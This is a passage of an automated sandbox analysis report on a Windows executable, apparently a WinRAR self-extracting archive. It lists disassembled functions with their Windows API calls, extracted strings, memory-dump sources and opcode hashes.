                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3$ClearVariant
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                        • API String ID: 4196654922-3505469590
                                        • Opcode ID: 376d09a1528f37ccd5600b7088c8467271ea5f8a9986ee6684af2e9fded2ed6c
                                        • Instruction ID: f8b5a46efdb604e1388e14d35b9435cbee5d3337d2635110410a85ebf8614689
                                        • Opcode Fuzzy Hash: 376d09a1528f37ccd5600b7088c8467271ea5f8a9986ee6684af2e9fded2ed6c
                                        • Instruction Fuzzy Hash: 15616B74A21219AFDB54EFA4DC99EAEB7B8FF49310B14045CF502A72A0CB30AD15CF60
                                        Function 0028E07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID: $</p>$</style>$<br>$<style>
                                        • API String ID: 3746244732-3393513139
                                        • Opcode ID: 3da78299d21f32aa0b71e37b98c71078d456bd60f1a9d22f8f92e8f1158340d1
                                        • Instruction ID: 53c08f0dafedf756e27f48071493b0029eb42225e8554d2463e0c8ecebcf8748
                                        • Opcode Fuzzy Hash: 3da78299d21f32aa0b71e37b98c71078d456bd60f1a9d22f8f92e8f1158340d1
                                        • Instruction Fuzzy Hash: 1651463DB3221393DF30BE24881577AB3A6AF65741F5A4019FD85AB2C1EB759DB08390
                                        Function 0028E265 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028E26C
                                        • ShowWindow.USER32(?,00000000,00000038), ref: 0028E294
                                        • GetWindowRect.USER32(?,?), ref: 0028E2D8
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 0028E373
                                        • ShowWindow.USER32(00000000,00000005), ref: 0028E394
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$Show$H_prolog3_Rect
                                        • String ID: RarHtmlClassName$gI)
                                        • API String ID: 950582801-1431589318
                                        • Opcode ID: d158ed4b226c52aa727216e00aec581c4bf0529b418ab76e0117a8f5bd8451f2
                                        • Instruction ID: 17f09e8aca02569279d576464ecd3a3bfbb155e448d8c0911c5c7e4f02631d50
                                        • Opcode Fuzzy Hash: d158ed4b226c52aa727216e00aec581c4bf0529b418ab76e0117a8f5bd8451f2
                                        • Instruction Fuzzy Hash: DD416A71911205EFDF11AFA4EC89EAE7BB8EF48300F154056F908AB195DB709D61CF60
                                        Function 0028F1EC Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0028F1F5
                                        • GetObjectW.GDI32(?,00000018,?), ref: 0028F224
                                        • ReleaseDC.USER32(00000000,?), ref: 0028F2BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ObjectRelease
                                        • String ID: NK)$Pl)uDK)$lK)$vK)
                                        • API String ID: 1429681911-4032922049
                                        • Opcode ID: 30d320d4948e9b480a57caf209a05276d5b28ce597cb7af554f17514b79b3145
                                        • Instruction ID: c84cdd7288e503bf740580bdda953e79ef48ea212ef0fa91dd073f249e46c165
                                        • Opcode Fuzzy Hash: 30d320d4948e9b480a57caf209a05276d5b28ce597cb7af554f17514b79b3145
                                        • Instruction Fuzzy Hash: 3F21E6B610C314AFD7019FA1EC4CE6BBFA9FB89351F040929FE4592220D67199558F62
                                        Function 00294D5F Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00294DDA,00294D3D,00294FDE), ref: 00294D76
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00294D8C
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00294DA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p],
                                        • API String ID: 667068680-2660665386
                                        • Opcode ID: dc471c4615f2fb3078951bfcfbe53b69e8c4aab618415fd6e97cad84a8c409fb
                                        • Instruction ID: c5c8db4cbbc207ae027ccc3b99a459e0d7564a3ff5e77f5582baca4cae8ea5ec
                                        • Opcode Fuzzy Hash: dc471c4615f2fb3078951bfcfbe53b69e8c4aab618415fd6e97cad84a8c409fb
                                        • Instruction Fuzzy Hash: 57F0C239631B23AB0F617EB46C88F7722D8AE077593110139D602D2680EA50DCB386F0
                                        Function 00287818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __aulldiv.LIBCMT ref: 0028783D
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00287860
                                        • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00287872
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00287883
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00287893
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002878A3
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002878DE
                                        • __aullrem.LIBCMT ref: 00287984
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: e9a6397e884f0bead76af10329b38255852077923ec31b422accc72a794e0bc2
                                        • Instruction ID: 7622184e7b53d079675936882d07b63294697d396b7733747040912d193d3116
                                        • Opcode Fuzzy Hash: e9a6397e884f0bead76af10329b38255852077923ec31b422accc72a794e0bc2
                                        • Instruction Fuzzy Hash: 8F5155B1508305AFD710DF64D88496BFBE9FF88314F108A2EF59AD2250E738E958CB52
                                        Function 00292B26 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 291COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00292B66
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 00280BF3: _wcslen.LIBCMT ref: 00280C03
                                        • EndDialog.USER32(?,00000001), ref: 00292EDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen$DialogPathTemp
                                        • String ID: $@set:user$\S,$\S,
                                        • API String ID: 2172748170-1925104358
                                        • Opcode ID: 602622f81256ef74b6835b9095eddff8207670a8eca65aa2e2374343a0e305ca
                                        • Instruction ID: efa4367d79ae8302c5a337cd36f1d885d25427a3433ffc4decdc77c739ee3c3a
                                        • Opcode Fuzzy Hash: 602622f81256ef74b6835b9095eddff8207670a8eca65aa2e2374343a0e305ca
                                        • Instruction Fuzzy Hash: ECC14C30C21269EADF24EBA4DC45BDDBBB8AF15300F4440DAE449B3292DB705B99CF61
                                        Function 00280E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00280E50
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00280E85
                                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00280EC4
                                        • _wcslen.LIBCMT ref: 00280ED4
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00280F51
                                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00280F93
                                        • _wcslen.LIBCMT ref: 00280FA3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FullNamePath$_wcslen$H_prolog3_
                                        • String ID:
                                        • API String ID: 840513527-0
                                        • Opcode ID: f9ed3f7e1c062b674905f4ccc555193a981fe5bfa7c47be25bf078b16367a36d
                                        • Instruction ID: bc98cc631352dee69e4ef6bed387b2adc3727b88319052d0435d4dcb0d8b2c2f
                                        • Opcode Fuzzy Hash: f9ed3f7e1c062b674905f4ccc555193a981fe5bfa7c47be25bf078b16367a36d
                                        • Instruction Fuzzy Hash: 54618C75D21209ABDF14EFA8DC84AEEBBBDAF85710F14410AF814E7281DB34D965CB60
                                        Function 002A6239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002A69AE,?,00000000,?,00000000,00000000), ref: 002A627B
                                        • __fassign.LIBCMT ref: 002A62F6
                                        • __fassign.LIBCMT ref: 002A6311
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002A6337
                                        • WriteFile.KERNEL32(?,?,00000000,002A69AE,00000000,?,?,?,?,?,?,?,?,?,002A69AE,?), ref: 002A6356
                                        • WriteFile.KERNEL32(?,?,00000001,002A69AE,00000000,?,?,?,?,?,?,?,?,?,002A69AE,?), ref: 002A638F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e014f3cd93e490c59deef3ea2de20d328fdba43d914cb91ad8570ac61396380f
                                        • Instruction ID: 3276d791669e32144a1c35384ce2d76bd7c080f50e02ea4542f4747b6baf7191
                                        • Opcode Fuzzy Hash: e014f3cd93e490c59deef3ea2de20d328fdba43d914cb91ad8570ac61396380f
                                        • Instruction Fuzzy Hash: CE510770E10249DFDF10CFA8D849AEEBBF8EF0A710F18455AE542E3291EB709951CB50
                                        Function 002993C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 002993F7
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002993FF
                                        • _ValidateLocalCookies.LIBCMT ref: 00299488
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002994B3
                                        • _ValidateLocalCookies.LIBCMT ref: 00299508
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: b1b16fd19422a03e5fcf2f0fb77fd73efc943c1c858e89cf48779031e824c2fb
                                        • Instruction ID: 528560eb3624a905b4e9a61d52d201cc97af7540dd34545058f788f39fcf1ea0
                                        • Opcode Fuzzy Hash: b1b16fd19422a03e5fcf2f0fb77fd73efc943c1c858e89cf48779031e824c2fb
                                        • Instruction Fuzzy Hash: 8341A634A20209AFCF11DF6CC885ADEBBB5BF45324F148159E8149B352D731A9A6CF91
                                        Function 002A3554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002A3518: _free.LIBCMT ref: 002A3541
                                        • _free.LIBCMT ref: 002A35A2
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A35AD
                                        • _free.LIBCMT ref: 002A35B8
                                        • _free.LIBCMT ref: 002A360C
                                        • _free.LIBCMT ref: 002A3617
                                        • _free.LIBCMT ref: 002A3622
                                        • _free.LIBCMT ref: 002A362D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                        • Instruction ID: f255889465f9bb19393dfbb8ffef78d86408ecf1710d7868eb8a9afc2afd5b3e
                                        • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                        • Instruction Fuzzy Hash: EC11DD71960B04BBD934FBB4CC47FCBB79C5F0A700F804C15B29966152DE79B6294B90
                                        Function 002907E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 002907F5
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0029081A
                                        • DeleteObject.GDI32(00000000), ref: 0029084C
                                        • DeleteObject.GDI32(00000000), ref: 0029086F
                                          • Part of subcall function 0028EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00290845,00000066), ref: 0028EBE6
                                          • Part of subcall function 0028EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EBFD
                                          • Part of subcall function 0028EBD3: LoadResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC14
                                          • Part of subcall function 0028EBD3: LockResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC23
                                          • Part of subcall function 0028EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00290845,00000066), ref: 0028EC3E
                                          • Part of subcall function 0028EBD3: GlobalLock.KERNEL32(00000000), ref: 0028EC4F
                                          • Part of subcall function 0028EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028EC73
                                          • Part of subcall function 0028EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028ECB8
                                          • Part of subcall function 0028EBD3: GlobalUnlock.KERNEL32(00000000), ref: 0028ECD7
                                          • Part of subcall function 0028EBD3: GlobalFree.KERNEL32(00000000), ref: 0028ECDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                        • String ID: Pl)uDK)$]
                                        • API String ID: 1797374341-538808356
                                        • Opcode ID: 762a74612c1678482b0b5b7e860a3b2e435e6ea95a27ebffc976c62915dce279
                                        • Instruction ID: 0f508befa31bd0296161a22158bb90ac7a18849885003c993b94067ea739a71b
                                        • Opcode Fuzzy Hash: 762a74612c1678482b0b5b7e860a3b2e435e6ea95a27ebffc976c62915dce279
                                        • Instruction Fuzzy Hash: 1001F93666121AABEF117B64AC49E7F367ABF80B55F060024F900A72D1DF718C254BE1
                                        Function 002A1609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0029C5A2,0029C5A2,?,?,?,002A185A,00000001,00000001,C5E85006), ref: 002A1663
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002A185A,00000001,00000001,C5E85006,?,?,?), ref: 002A16E9
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002A17E3
                                        • __freea.LIBCMT ref: 002A17F0
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        • __freea.LIBCMT ref: 002A17F9
                                        • __freea.LIBCMT ref: 002A181E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: e6e938ea6b31de5ad81206c40e57477ac7666d571efc6178fcb4de446170ae80
                                        • Instruction ID: ae4e27919da6ffec6572f5e5cb2b6b14b5081d5420ae6e704d4f0a3bb51e4e46
                                        • Opcode Fuzzy Hash: e6e938ea6b31de5ad81206c40e57477ac7666d571efc6178fcb4de446170ae80
                                        • Instruction Fuzzy Hash: CE519572620216AFEB258F64DC85EBBB7AAEB46770F154229FD04D6140EF74DC70CA50
                                        Function 00287AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00287B06
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B2A
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00287B44
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00287B57
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B67
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: aa658f5ca1a2d62489591811c63cda11ca0a4165406027b665a08fd3ceed09fa
                                        • Instruction ID: 577eccb84797389c976718d4816a480fabd178b75bcf517588907ff9eb4241a4
                                        • Opcode Fuzzy Hash: aa658f5ca1a2d62489591811c63cda11ca0a4165406027b665a08fd3ceed09fa
                                        • Instruction Fuzzy Hash: 2941387A2183159FC704DFA8D88499BB7E8FF98714F04491EF999C7210EB30D949CBA6
                                        Function 0028F33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?,D946AC94,?,?,?,?,002AAA27,000000FF), ref: 0028F38A
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F399
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F3A7
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F3B5
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,002AAA27,000000FF), ref: 0028F3D0
                                        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,002AAA27,000000FF), ref: 0028F3FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
